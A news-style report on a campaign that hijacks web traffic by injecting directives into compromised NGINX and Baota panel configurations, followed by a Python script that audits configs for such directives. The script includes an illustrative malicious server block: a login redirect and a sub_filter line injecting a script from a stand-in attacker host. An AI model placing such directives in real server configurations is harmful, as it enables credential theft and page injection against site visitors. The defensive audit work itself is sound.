Cybersecurity researchers have uncovered an ongoing, large-scale campaign that is hijacking web traffic by compromising NGINX web servers and related management software. The campaign, which targets systems globally, aims to stealthily reroute internet traffic through infrastructure controlled by attackers, posing significant data theft and surveillance risks.
Security analysts from Datadog Security Labs first detected the activity. They reported that threat actors, some linked to the recent exploitation of a critical vulnerability known as React2Shell (CVE-2025-55182), are deploying malicious configuration files on NGINX servers. NGINX is among the most popular web server platforms in the world, powering a vast portion of the internet.
Method of Compromise and Targets
The attackers are not exploiting a flaw in the NGINX software itself. Instead, they are gaining unauthorized access to servers and their control panels to insert harmful directives into the NGINX configuration files. A primary target has been the Baota panel, also known as BT, which is a widely used server management tool in some regions for simplifying the administration of services like NGINX.
Once inside a system, the attackers modify the configuration to intercept and redirect user traffic. This technique allows them to monitor, log, or manipulate data flowing between visitors and the legitimate website. The malicious code can be designed to steal login credentials, session cookies, financial information, or inject malicious content into web pages without the user’s or site owner’s knowledge.
Scale and Implications of the Hijacking
While the exact number of compromised servers is still being assessed, the campaign’s methodology suggests it has the potential to affect a wide range of websites and online services. Because NGINX is foundational to modern web infrastructure, from small blogs to large enterprise and e-commerce platforms, the impact of such traffic interception is severe.
The hijacking undermines the fundamental security and privacy expectations of internet users. It also represents a serious breach of trust for website operators, who may be unaware their server is funneling visitor data to a third party. This type of attack can be used for espionage, large-scale credential harvesting, or as a precursor to further malware distribution.
Recommended Response and Mitigation
Security firms and industry experts advise administrators of NGINX servers, particularly those using management panels like Baota, to conduct immediate audits of their systems. Key steps include reviewing all NGINX configuration files for unauthorized changes, checking server access logs for suspicious activity, and ensuring all access credentials and software are up to date with the latest security patches.
Organizations are urged to implement strong, unique passwords and multi-factor authentication for all administrative interfaces. Regular security monitoring and file integrity checks are also critical to detect unauthorized modifications promptly. The disclosure of this campaign has prompted renewed warnings about the security risks associated with internet-exposed management panels.
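The configuration audit and file integrity checks recommended above can be scripted. The following is an added example, not code from Datadog or the original report: it flags NGINX directives that redirect, proxy or rewrite traffic toward hosts outside an administrator-defined allowlist, and compares config files against a stored SHA-256 baseline. The sample server block, the hostnames `shop.example.org` and `attacker.invalid`, and the allowlist are all constructed for illustration.

```python
"""Audit NGINX configuration text for traffic-hijacking directives and
check config files against a known-good SHA-256 baseline."""
import hashlib
import re
from pathlib import Path

# Directives an injected hijacking config typically adds: external
# redirects, reverse-proxying to a foreign upstream, and response-body
# rewriting. A directive starts a line or follows '{' or ';'.
PATTERNS = [
    ("return", re.compile(r"(?:^|[{;])\s*return\s+30\d\s+(\S+?)\s*;", re.M)),
    ("proxy_pass", re.compile(r"(?:^|[{;])\s*proxy_pass\s+(\S+?)\s*;", re.M)),
    ("rewrite", re.compile(r"(?:^|[{;])\s*rewrite\s+\S+\s+(\S+?)\s+(?:redirect|permanent)\s*;", re.M)),
    ("sub_filter", re.compile(r"(?:^|[{;])\s*sub_filter\s+(.+?)\s*;", re.M)),
]

def target_host(target):
    """Host part of a URL-like target; handles '$scheme://host/...' too."""
    m = re.search(r"://([^/:;\s]+)", target)
    return m.group(1) if m else None

def scan_config(text, allowed_hosts):
    """Return (directive, target) pairs whose host is not allowlisted.
    sub_filter is always reported because it rewrites response bodies."""
    findings = []
    for name, pattern in PATTERNS:
        for match in pattern.finditer(text):
            target = match.group(1)
            host = target_host(target)
            if name == "sub_filter" or (host and host not in allowed_hosts):
                findings.append((name, target))
    return findings

def changed_files(baseline):
    """baseline: {path: sha256 hex}. Returns paths that changed or vanished."""
    changed = []
    for path, digest in baseline.items():
        p = Path(path)
        if not p.exists() or hashlib.sha256(p.read_bytes()).hexdigest() != digest:
            changed.append(path)
    return changed

# Constructed sample: a legitimate local proxy_pass plus an injected
# external login redirect and a script injection via sub_filter.
SAMPLE_CONF = """
server {
    listen 80;
    server_name shop.example.org;
    location /api/ { proxy_pass http://127.0.0.1:8080; }
    location /login { return 302 https://attacker.invalid/l; }
    sub_filter '</body>' '<script src="https://attacker.invalid/x.js"></script></body>';
}
"""

if __name__ == "__main__":
    for directive, target in scan_config(SAMPLE_CONF, {"127.0.0.1", "localhost"}):
        print(f"suspicious {directive}: {target}")
```

Run it against `/etc/nginx/nginx.conf` and every file it includes (panel-managed sites often live under a separate vhost directory), and keep the baseline hashes somewhere the web server's account cannot write.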
Looking ahead, cybersecurity teams are expected to continue analyzing the attack patterns to identify indicators of compromise and potentially link the activity to specific threat groups. Further advisories detailing technical signatures and defensive configurations for NGINX are anticipated from security vendors and national cybersecurity agencies in the coming days.
Source: Datadog Security Labs